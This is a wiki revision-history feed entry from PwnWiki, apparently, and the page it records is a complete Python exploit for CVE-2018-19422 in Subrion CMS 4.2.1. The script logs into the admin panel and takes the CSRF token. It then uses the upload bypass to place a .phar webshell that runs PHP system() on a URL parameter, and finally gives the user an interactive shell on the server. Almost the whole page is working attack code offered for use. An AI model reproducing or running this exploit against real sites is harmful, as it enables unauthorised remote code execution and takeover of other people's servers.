https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2018-19422_Subrion_CMS_4.2.1_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%26RCE%E6%BC%8F%E6%B4%9E CVE-2018-19422 Subrion CMS 4.2.1 任意文件上傳&RCE漏洞 - Revision history 2026-04-11T07:05:38Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=CVE-2018-19422_Subrion_CMS_4.2.1_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%26RCE%E6%BC%8F%E6%B4%9E&diff=2889&oldid=prev Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: Subrion CMS 4.2.1 - File Upload Bypass to RCE (Authenticated) # Date: 17/05/2021 # Exploit Author: Fellipe Oliveira # Vendor Homepage: https://s..." 2021-05-17T10:24:46Z <p>Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: Subrion CMS 4.2.1 - File Upload Bypass to RCE (Authenticated) # Date: 17/05/2021 # Exploit Author: Fellipe Oliveira # Vendor Homepage: https://s...&quot;</p> <p><b>New page</b></p><div>==EXP==<br /> &lt;pre&gt;<br /> # Exploit Title: Subrion CMS 4.2.1 - File Upload Bypass to RCE (Authenticated)<br /> # Date: 17/05/2021<br /> # Exploit Author: Fellipe Oliveira<br /> # Vendor Homepage: https://subrion.org/<br /> # Software Link: https://github.com/intelliants/subrion<br /> # Version: SubrionCMS 4.2.1<br /> # Tested on: Debian9, Debian 10 and Ubuntu 16.04<br /> # CVE: CVE-2018-19422<br /> # Exploit Requirements: BeautifulSoup library<br /> # https://github.com/intelliants/subrion/issues/801<br /> <br /> #!/usr/bin/python3<br /> <br /> import requests<br /> import time<br /> import optparse<br /> import random<br /> import string<br /> from bs4 import BeautifulSoup<br /> <br /> parser = optparse.OptionParser()<br /> parser.add_option('-u', '--url', action=&quot;store&quot;, dest=&quot;url&quot;, help=&quot;Base target uri http://target/panel&quot;)<br /> parser.add_option('-l', '--user', action=&quot;store&quot;, dest=&quot;user&quot;, help=&quot;User credential to login&quot;)<br /> parser.add_option('-p', '--passw', action=&quot;store&quot;, dest=&quot;passw&quot;, help=&quot;Password credential to login&quot;)<br /> <br /> options, args = parser.parse_args()<br /> <br /> if not options.url:<br /> print('[+] Specify an url target')<br /> print('[+] Example usage: exploit.py -u http://target-uri/panel')<br /> print('[+] Example help usage: exploit.py -h')<br /> exit()<br /> <br /> url_login = options.url<br /> url_upload = options.url + 'uploads/read.json'<br /> url_shell = options.url + 'uploads/'<br /> username = options.user<br /> password = options.passw<br /> <br /> session = requests.Session()<br /> <br /> def login():<br /> global csrfToken<br /> print('[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422 \n')<br /> print('[+] Trying to connect to: ' + url_login)<br /> try:<br /> get_token_request = session.get(url_login)<br /> soup = BeautifulSoup(get_token_request.text, 'html.parser')<br /> csrfToken = soup.find('input',attrs = {'name':'__st'})['value']<br /> print('[+] Success!')<br /> time.sleep(1)<br /> <br /> if csrfToken:<br /> print(f&quot;[+] Got CSRF token: {csrfToken}&quot;)<br /> print(&quot;[+] Trying to log in...&quot;) <br /> <br /> auth_url = url_login<br /> auth_cookies = {&quot;loader&quot;: &quot;loaded&quot;}<br /> auth_headers = {&quot;User-Agent&quot;: &quot;Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0&quot;, &quot;Accept&quot;: &quot;text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8&quot;, &quot;Accept-Language&quot;: &quot;pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3&quot;, &quot;Accept-Encoding&quot;: &quot;gzip, deflate&quot;, &quot;Content-Type&quot;: &quot;application/x-www-form-urlencoded&quot;, &quot;Origin&quot;: &quot;http://192.168.1.20&quot;, &quot;Connection&quot;: &quot;close&quot;, &quot;Referer&quot;: &quot;http://192.168.1.20/panel/&quot;, &quot;Upgrade-Insecure-Requests&quot;: &quot;1&quot;}<br /> auth_data = {&quot;__st&quot;: csrfToken, &quot;username&quot;: username, &quot;password&quot;: password}<br /> auth = session.post(auth_url, headers=auth_headers, cookies=auth_cookies, data=auth_data)<br /> <br /> if len(auth.text) &lt;= 7000:<br /> print('\n[x] Login failed... Check credentials')<br /> exit()<br /> else:<br /> print('[+] Login Successful!\n')<br /> else:<br /> print('[x] Failed to got CSRF token')<br /> exit()<br /> <br /> except requests.exceptions.ConnectionError as err:<br /> print('\n[x] Failed to Connect in: '+url_login+' ')<br /> print('[x] This host seems to be Down')<br /> exit()<br /> <br /> return csrfToken<br /> <br /> def name_rnd():<br /> global shell_name <br /> print('[+] Generating random name for Webshell...')<br /> shell_name = ''.join((random.choice(string.ascii_lowercase) for x in range(15)))<br /> time.sleep(1) <br /> print('[+] Generated webshell name: '+shell_name+'\n')<br /> <br /> return shell_name<br /> <br /> def shell_upload():<br /> print('[+] Trying to Upload Webshell..')<br /> try:<br /> up_url = url_upload<br /> up_cookies = {&quot;INTELLI_06c8042c3d&quot;: &quot;15ajqmku31n5e893djc8k8g7a0&quot;, &quot;loader&quot;: &quot;loaded&quot;}<br /> up_headers = {&quot;User-Agent&quot;: &quot;Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0&quot;, &quot;Accept&quot;: &quot;*/*&quot;, &quot;Accept-Language&quot;: &quot;pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3&quot;, &quot;Accept-Encoding&quot;: &quot;gzip, deflate&quot;, &quot;Content-Type&quot;: &quot;multipart/form-data; boundary=---------------------------6159367931540763043609390275&quot;, &quot;Origin&quot;: &quot;http://192.168.1.20&quot;, &quot;Connection&quot;: &quot;close&quot;, &quot;Referer&quot;: &quot;http://192.168.1.20/panel/uploads/&quot;}<br /> up_data = &quot;-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\&quot;reqid\&quot;\r\n\r\n17978446266285\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\&quot;cmd\&quot;\r\n\r\nupload\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\&quot;target\&quot;\r\n\r\nl1_Lw\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\&quot;__st\&quot;\r\n\r\n&quot;+csrfToken+&quot;\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\&quot;upload[]\&quot;; filename=\&quot;&quot;+shell_name+&quot;.phar\&quot;\r\nContent-Type: application/octet-stream\r\n\r\n&lt;?php system($_GET['cmd']); ?&gt;\n\r\n-----------------------------6159367931540763043609390275\r\nContent-Disposition: form-data; name=\&quot;mtime[]\&quot;\r\n\r\n1621210391\r\n-----------------------------6159367931540763043609390275--\r\n&quot;<br /> session.post(up_url, headers=up_headers, cookies=up_cookies, data=up_data)<br /> <br /> except requests.exceptions.HTTPError as conn:<br /> print('[x] Failed to Upload Webshell in: '+url_upload+' ')<br /> exit()<br /> <br /> def code_exec():<br /> try:<br /> url_clean = url_shell.replace('/panel', '')<br /> req = session.get(url_clean + shell_name + '.phar?cmd=id')<br /> <br /> if req.status_code == 200:<br /> print('[+] Upload Success... Webshell path: ' + url_shell + shell_name + '.phar \n')<br /> while True:<br /> cmd = input('$ ')<br /> x = session.get(url_clean + shell_name + '.phar?cmd='+cmd+'')<br /> print(x.text)<br /> else:<br /> print('\n[x] Webshell not found... upload seems to have failed')<br /> except:<br /> print('\n[x] Failed to execute PHP code...')<br /> <br /> login()<br /> name_rnd()<br /> shell_upload()<br /> code_exec()<br /> &lt;/pre&gt;</div> Pwnwiki